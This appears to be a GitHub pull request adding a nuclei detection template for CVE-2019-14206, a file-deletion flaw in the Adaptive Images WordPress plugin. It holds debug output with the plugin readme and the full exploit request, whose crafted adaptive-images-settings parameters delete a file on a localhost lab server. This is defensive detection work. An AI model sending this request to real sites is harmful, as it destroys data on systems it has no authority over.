Add CVE-2019-14206 detection template

[KrE80r]

/claim 14693

Summary

• Adds detection template for CVE-2019-14206 (Nevma Adaptive Images < 0.6.67 - Arbitrary File Deletion)
• Tests actual file deletion, not just LFI/path traversal detection
• Uses /tmp directory mtime as timing reference (reliable on active servers)

Template Details

Field	Value
CVE	CVE-2019-14206
Severity	Critical (CVSS 9.1)
Vendor	Nevma
Product	Adaptive Images for WordPress
CWE	CWE-22 (Path Traversal)

Detection Method

1. Verify plugin readme.txt exists (status 200)
2. Trigger deletion via unsanitized adaptive-images-settings parameters
3. Confirm readme.txt was deleted (status != 200)

Test Plan

• Tested on vulnerable environment
• Tested on non-vulnerable environment

Notes

Vulnerable environment shared privately.

Debug Output

nuclei -t CVE-2019-14206.yaml -u http://localhost:8080 -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.8

                projectdiscovery.io

[INF] Current nuclei version: v3.3.8 (outdated)
[INF] Current nuclei-templates version: v10.3.6 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 42
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2019-14206] Dumped HTTP request for http://localhost:8080/wp-content/plugins/adaptive-images/readme.txt

GET /wp-content/plugins/adaptive-images/readme.txt HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2019-14206] Dumped HTTP response http://localhost:8080/wp-content/plugins/adaptive-images/readme.txt

HTTP/1.1 200 OK
Connection: close
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sun, 04 Jan 2026 09:22:35 GMT
Etag: "4a5b-6478c7a3bd900-gzip"
Last-Modified: Sun, 04 Jan 2026 09:22:12 GMT
Server: Apache/2.4.38 (Debian)
Vary: Accept-Encoding


=== Adaptive Images for WordPress ===

Contributors: nevma
Donate link: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=WCES7V9D45HDS
Tags: adaptive images, responsive images, mobile images, resize images, optimize images, adaptive, responsive, mobile, resize, optimize, images
Requires at least: 4.0
Tested up to: 5.0
Stable tag: 0.6.65
License: GPLv2 or later
License URI: http://www.gnu.org/licenses/gpl-2.0.html

Adaptive images plugin transparently resizes your images, per device screen size, in order to reduce download times in mobile environments. 



== Description ==

= Adaptive Images =

Resizes and optimizes images delivered to mobile devices, in a transparent and unobtrusive way, so that the total download time is dramatically reduced. It works as a filter between the device and your WordPress website. It actually works for all types of device screen sizes, although it is targeted mostly at mobile environments. 

Note that this is not a CSS responsive images solution. This plugin does not force browsers to render images as if they were smaller. It actually sends smaller images to them! Then it is the job of the CSS to instruct the browsers how to render them. 

= Fundamental goals = 

 1. Reduce the total download time in mobile devices dramatically.
 2. Work transparantly and unobtrusively by being independant of your theme code.
 3. Be agnostic of the yet-not-finalized `picture` element or HTML img `srcset` attribute.

 = Side benefits =

 1. Respects search engines and sends them the orginal version of each image, because it depends on Javascript.
 2. If it does not recognise a device screen it falls over to the original image size. But even this is very rare and mostly refers to very old or possibly deprecated devices. 
 3. Does not need to load the WordPress ennironment in order to resize and compress images.

= Supported formats =

 - JPEG
 - PNG
 - GIF (not animated)

= CDN/Varnish/external caching service support =

Since version 0.6.0 CDN/Varnish/external caching service support has been added as an option, in an ***experimental*** mode. This mode is experimental in the following ways: i) it is not thorougly tested yet ii) however, it works in almost all test cases so far iii) it bears no dangers to your installation iv) it adds a special url parameter to your image urls, so it is slightly obtrusive.

Cannot work, not even in experimental mode, with CDNs which use a different subdomain for images, because these setups completely bypass WordPress when delivering images. Feel free to ask for details on this in the support forum.

= Default breakpoints =

 - 1024px wide screens
 - 640px wide screens
 - 480px wide screens

Since version 0.5.0 and upwards it is configurable whether the plugin should take into account the landscape or the portrait orientation of each device.

HiDPI (high device pixel density or retina) screens are supported too.

= How to test = 

 1. Test with Chrome's device emulation mode https://developer.chrome.com/devtools/docs/device-mode in Developer Tools. See here https://www.youtube.com/watch?v=hCAC1XUUOvw/ for an example. Unfortunately, Firefox's Responsive Design Mode does not actually emulate a mobile screen size!
 2. Test with a tool like Webpagetest http://www.webpagetest.org/. Make sure you set the "Emulate Mobile Browser" setting in the "Advanced Settings" > "Chrome" tab. 
 3. Test with a tool like GTmetrix http://gtmetrix.com/. Make sure you enable mobile device testing. The plugin will have no effect on desktop sized devices.
 4. Test with an actual mobile device, a smartphone or tablet. Watch your website load in a snap.
 5. Check the `/wp-contents/cache` directory to see the `/adaptive-images` directory and its contents. This is where the resized images are kept and cached by default.

Also you can:

 1. View an image straight from a browser and add a "?debug=true" at the end of the url like this "http://www.website.com/wp-content/uploads/2015/01/image.jpg?debug=true". This should print useful debug information about the plugin functions in your installation. If you keep seeing your image, then the plugin is not working as it should and the cause is probably a failure to update the .htaccess file properly.
 2. Add a "?debug=original" at the end of the url of an image and you will see the orginal version of the image even when a smaller version of it should have been shown.
 3. Hit the "Print debug" and "Print diagnostics" buttons at the plugin settings page to see useful debug information about the plugin and your WordPress installation.

You could test with a normal desktop browser, but only if the computer screen size falls under at least of one of the specified breakpoints!

= Incompatibilities and issues = 

 - The plugin supports Nginx, but the server's configuration file must be manually configured like this:

```location / {
    rewrite \.(?:jpe?g|gif|png)$ /wp-content/plugins/adaptive-images/adaptive-images-script.php;
}```

 - Windows IIS is not supported, but could be manually configured. Any IIS experts are welcome to contribute.
 - Cannot work, not even in experimental mode, with CDNs which use a different subdomain for images. 
 - When using HTTPS/SSL make sure that you update all your website urls and also the urls in your WordPress General
   settings page, otherwise the plugin will not be able to locate your images. 

= Stuff to keep in mind = 

 - The plugin needs to add a little bit of code to your `.htaccess` file in order to function properly. It removes this code once disabled. If you are not cool with that, then… tough luck! 
 - The plugin does not care whether the device is actually mobile or not. It checks the device screen resolution. If you have set your breakpoints big enough then it should work just as good for desktop devices as well. However it targets mostly the mobile ones.
 - The resized versions of the pictures are kept in a special directory in the `/wp-content/cache` directory. This causes some storage overhead. It is up to you to judge whether this overhead is a sustainable option in your hosting environment.
 - The plugin does not help with (nor hinder) art direction. Simple as that. Art direction https://usecases.responsiveimages.org/#art-direction in responsive images is an entirely different, yet important, problem. This plugin does not tackle with it. But it works in a supplementary way without interfering with other solutions that do. This means that you can combine it with any art direction solution.

= Credits = 

 - The plugin was originally based on the WP-Resolutions plugin https://github.com/JorgenHookham/WP-Resolutions/, but since version 0.3.0 it is a complete rewrite!
 - Both plugins - WP-Resolutions and this one - have borrowed ideas from the Adaptive Images http://adaptive-images.com/ solution specially adapted for WordPress.
 - Many-many thanks to "railgunner" for the initial idea in the forum and to the Pressidium team for helping with debugging the CDN/Varnish/external caching service feature.
 - Thanks to "minorgod" for the Windows path fix.
 - Also, many thanks to my good friend and colleague Antonis Zachopoulos for the countless times that he provided ideas and debugging hints.

Thank you all for using and testing the plugin and, please, do let us know how it works (or doesn't work) for you. We love comments and creative feedback!



== Installation ==

= Usual process =

 1. Install the plugin via "Plugins > Add New".
 2. Activate the plugin.
 3. Go to its settings and save them!

The plugin should simply work! 

De-activate the plugin to disable it. Activate the plugin to enable it. Delete it and it's gone. So simple. 



== Frequently Asked Questions ==

= What's the story? =

First came the Adaptive Images solution http://adaptive-images.com/ which is still there and works on its own. Then came the WP-Resolutions plugin https://github.com/JorgenHookham/WP-Resolutions. But it is not in the WordPress plugin repository anymore and the Github version is not compatible with the latest WordPress versions. So we are updating and maintaining it. Many under the hood changes have taken place, but the overall functionality is the same.

Since version 0.5.0 the plugin has been completely rewritten, in order to not rely on the Adaptive Images solution, which was released under a CC-BY license that is not compatible with the GPL. This problem has now been overcome and the part that used to rely on the Adaptive Images is brand new!

= Is this plugin heavy? =

Well, not much really. The image resizing process is not computationally negligible, but the images are only resized when they are first requested and then they are cached. However, it must be noted that the images in the watched directories, the ones the plugin is responsible for resizing and delivering, are ultimately delivered by a PHP script and not a generic server process! 

So actually one has to decide on a balance between creating and storing too many image sizes in contrast to burdening their server resources. 



== Screenshots ==

1. Plugin settings page in the admin area.
2. Resized versions of your images are cached by default in `/wp-content/cache/adaptive-images`.
3. Total web page load time is reduced dramatically on a mobile device (tested in http://webpagetest.org/).
4. Each device is served an image resized its real dimensions, therefore a lot smaller in total size.



== Upgrade Notice ==

= 0.6.63 =

The bug concerning the protocol (HTTP vs HTTPS) of the urls in your /wp-admin General > Settings being being the same as the protocol of your website has been fixed. 

= 0.6.62 =

It is recommended for users to save one's settings anew, especially if their installation is in a subdirectory or if they have renamed their wp-content or uploads directory.

= 0.5.0 =

It is recommended, but not absolutely necessary, to save one's settings anew, due to the big changes in the image resizing script, which was completely re-written, renamed and relocated inside the plugin's directories since this version. 

= 0.3.0 =

Ater upgrading to version 0.3.0 you will need to:

 - Save your settings anew. If you do not then the plugin will operate with its current default settings without problems as it is expected.
 - Manually delete the old image cache directory `/wp-content/cache-ai`. The new default image cache directory is `/wp-content/cache/adaptive-images`.

Apologies for the inconvenience! We are still in early versions. What is important is that the plugin actually works as intended. We try to minimize the hassle between these versions. This is not expected to happen pretty often.



== Changelog ==

= 0.6.65 =

 - Fixed minor regular expression issue that appeared in PHP 7.3 and caused the cache directory and watched directories to be saved as empty strings. 

= 0.6.64 =

 - Windows path fix (thanks to @minorgod). 

= 0.6.63 =

 - Bug fix when HTTPS was reported as "On" vs "on" in PHP. Now the comparison is case insensitive.
 - Bug fix to completely disregard request protocol (HTTP vs HTTPS) when resolving image paths from request urls. 

= 0.6.62 =

 - Bug fix handling decimal device pixel density.
 - Bug fix when the wp-content and/or uploads directories have been renamed.
 - Bug fix when WordPress installation is in a subdirectory, but the website url remains in the root directory.
 - Settings page user interface corrections.

= 0.6.61 =

 - Added notice for NginX's manual configuration.
 - Minor bug fixes.

= 0.6.60 =

 - Removed PNG8 compression for PNGs because it was not peoducing acceptable quality results. PNGs are now simply resized and compressed via normal 32bit PNG compression. In future versions there will be an option to enable and disable PNG8 compression at will and perhaps a way for the plugin to detect in which images it should apply PNG8 compression and in which others to apply 32bit PNG compression.

= 0.6.51 =

 - Just an update to the plugin version, because 0.6.41 was coming before 0.6.5, due to a lexicographical sorting and was not available as an update in the repository!

= 0.6.5 =

 - PHP warning in adaptive images script removed.

= 0.6.42 =

 - Minor bug fix when saving plugin settings.

= 0.6.41 =

 - Version 0.6.4 bug fix caused a new bug in image path resolution when the WordPress is installed in a subdirectory of the server root directory.

= 0.6.4 =

 - Fixed bug wp-content dir resolution within the standalone Adaptive Images image handling scrips, where sometimes the server document root was not reported by PHP as being the same as the WordPress installation path. 

= 0.6.3 =

 - Fixed bug in htaccess rewrite rules generation when installation is not in root directory.
 - Fixed bug in image delivery script where browser cache was not set correctly in some case.

= 0.6.2 =

 - Fixed bug where WordPress installation root directory was not calculated correctly in certain cases.

= 0.6.1 =

CDN/Varnish compatibility improved. Previously some images were downloaded in both their original and their resized version. Now they are only downloaded once. However if the website is too fast there may be 1-2 images that might manage to download in their original size. We guess that is OK, though.

= 0.6.0 =

 - Added CDN/Varnish/external caching service support.
 - Added Thickbox confirmation dialog on the cache cleanup button in the plugin settings page.
 - Added donation button in the plugin settings page.
 - Documentation stuff.

= 0.5.2 =

 - Fixed a bug where the path of the image resizing script was not correctly created in the `.htaccess` file (again).

= 0.5.1 =

 - Fixed a bug where the path of the image resizing script was not correctly created in the `.htaccess` file.
 - Some documentation.

= 0.5.0 =

 - New option in settings to define whether the plugin should use the bigger dimension of a device as its with or take into account the current orientation. Up to now the plugin used the width of the landscape orientation, which is the biggest of each device's dimensions.
 - New option in settings to define whether the plugin should use take special care for HiDPI (retina, high pixel density screens and serve these devices better quality images according to their pixel density.
 - Better PNG compression via PNG8. This converts true color PNG images to palette image, which reduces colours and the alpha channel Kudos http://stackoverflow.com/questions/5752514/how-to-convert-png-to-8-bit-png-using-php-gd-library/.
 - Fixed some edge cases of not being able to serve a resized image by reverting to original image. 
 - More analytical settings page debugging and diagnostics.
 - Added debugging methods in the image cache generation script.
 - Plugin can be configured to respect your default expires headers.
 - Some documentation stuff (as always).
 - Completely rewritten the script that generates and caches the resized versions of images in order to avoid the GPL vs CC-BY-3.0 licensing incompatibility of the original Adaptive Images script (http://adaptive-images.com/). Plugin is now totally independant and free of any licensing issues.
 - Due to the above, the image resizing script is no longer the same, it has been transformed to a new script, named `adaptive-images-script.php` which is in the root folder of the plugin. However the old script is still left inside the plugin folders for compatibility purposes (old versions and users not having saved their settings anew).

= 0.3.52 =

 - Documentation stuff.

= 0.3.51 =

 - Minor bug in settings page url parameters.
 - Documentation stuff.

= 0.3.5 =

 - Allow for default browser cache settings.
 - More thorough debugging information.
 - Added diagnostics debugging in the settings page.
 - Nicer admin area user messages with icons.
 - Minor fixes here (and there).
 - Documentation enhancements.

= 0.3.04 =

 - Documentation enhancements (yeah).
 - Added "noptimize" tag in HEAD Javascript to exclude it from optimizers.

= 0.3.03 =

 - Added Last-modified HTTP header for resized images, as the best practices do suggest.

= 0.3.02 =

 - When no device size/resolution is detected then show the original image. Helps avoid misunderstandings and sends search engines the actual images instead of the resized ones.

= 0.3.01 =

 - Documentation enhancements.

= 0.3.0 =

 - Almost a complete rewrite of the code.
 - Completely updated the settings page to be user friendly.
 - Added action in the settings page for cache cleanup.
 - Added action in the settings page for debug info.
 - Added action in the settings page for cache size calculation.
 - Added watched directories field in the settings page anew.
 - Divided the plugin files into logical parts.
 - Default resolutions changed to 1024, 640 and 480 because the cookie is set based on the max value between screen width and height and most screens have a height between 480 and 640px. Tablets are between 640 and 1024px wide/tall. The iPad is 1024px tall. A screen with a width higher than 1024px is probably not a mobile screen.
 - Changed default image cache directory in order to place it inside the expected WordPress `/wp-content/cache` directory, so now by default it is `/wp-content/cache/adaptive-images`.
 - Added check for the plugin options.
 - Added check for the PHP GD library.
 - Added check for the .htaccess file.
 - Added upgrade from older versions functions.
 - Added upgrade from 0.2.08 to 0.3.0 versions functions.
 - Added unistall script `uninstall.php`.
 - Documentation enhancements (as usual).

= 0.2.08 =

 - Added cache size calculation.
 - Added cache clean up methods.
 - Added nonces to admin actions.
 - Documentation enhancements.

= 0.2.06 =

 - Settings are now separate in an ai-user-settings.php file.

= 0.2.05 =

 - If the original requested image width and the device screen size are bigger than maximum available breakpoint, then serve the the original image. 

= 0.2.04 =

 - Refactoring code.

= 0.2.03 =

 - Set the default screen size breakpoints to 1024, 600, 320.

= 0.2.02 =

 - Refactoring code to separate Adaptive Images files from the other plugin files.

= 0.2.01 =

 - The first stable version after the initial fork.
 - Corrected basic PHP errors.
 - Corrected basic WordPress errors.
 - Now compatible with version 4.1.1.
 - New document root takes into account installations in subdirectories.

= 0.1 =

 - The version forked from the WP Resolutions plugin https://github.com/JorgenHookham/WP-Resolutions.
 - This version does not work with WordPress anymore (at least version 4.1.1 and upwards).
[INF] [CVE-2019-14206] Dumped HTTP request for http://localhost:8080/wp-content/plugins/adaptive-images/adaptive-images-script.php?resolution=480&adaptive-images-settings%5Bsource_file%5D=/tmp&adaptive-images-settings%5Bresolution%5D&adaptive-images-settings%5Bwp_content%5D=/var/www/html/wp-content&adaptive-images-settings%5Bcache_dir%5D=.&adaptive-images-settings%5Brequest_uri%5D=plugins/adaptive-images/readme.txt&adaptive-images-settings%5Bwatch_cache%5D=1

GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?resolution=480&adaptive-images-settings%5Bsource_file%5D=/tmp&adaptive-images-settings%5Bresolution%5D&adaptive-images-settings%5Bwp_content%5D=/var/www/html/wp-content&adaptive-images-settings%5Bcache_dir%5D=.&adaptive-images-settings%5Brequest_uri%5D=plugins/adaptive-images/readme.txt&adaptive-images-settings%5Bwatch_cache%5D=1 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14816.131.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2019-14206] Dumped HTTP response http://localhost:8080/wp-content/plugins/adaptive-images/adaptive-images-script.php?resolution=480&adaptive-images-settings%5Bsource_file%5D=/tmp&adaptive-images-settings%5Bresolution%5D&adaptive-images-settings%5Bwp_content%5D=/var/www/html/wp-content&adaptive-images-settings%5Bcache_dir%5D=.&adaptive-images-settings%5Brequest_uri%5D=plugins/adaptive-images/readme.txt&adaptive-images-settings%5Bwatch_cache%5D=1

HTTP/1.1 200 OK
Connection: close
Content-Type: image/jpeg
Date: Sun, 04 Jan 2026 09:22:35 GMT
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
Server: Apache/2.4.38 (Debian)
X-Powered-By: PHP/7.3.11
Content-Length: 0

[INF] [CVE-2019-14206] Dumped HTTP request for http://localhost:8080/wp-content/plugins/adaptive-images/readme.txt

GET /wp-content/plugins/adaptive-images/readme.txt HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2019-14206] Dumped HTTP response http://localhost:8080/wp-content/plugins/adaptive-images/readme.txt

HTTP/1.1 302 Found
Connection: close
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Jan 2026 09:22:35 GMT
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Location: http://localhost:8080/wp-admin/install.php
Server: Apache/2.4.38 (Debian)
X-Powered-By: PHP/7.3.11
X-Redirect-By: WordPress
Content-Length: 0

[CVE-2019-14206:dsl-1] [http] [critical] http://localhost:8080/wp-content/plugins/adaptive-images/readme.txt

References

• https://nvd.nist.gov/vuln/detail/CVE-2019-14206
• https://wpscan.com/vulnerability/9868

[DhiyaneshGeek]

Hi @KrE80r

Thanks for participating in the Bounty Claim Program

we are moving forward with this PR #14694 which met all the requirements

Due to the following reason we are closing this PR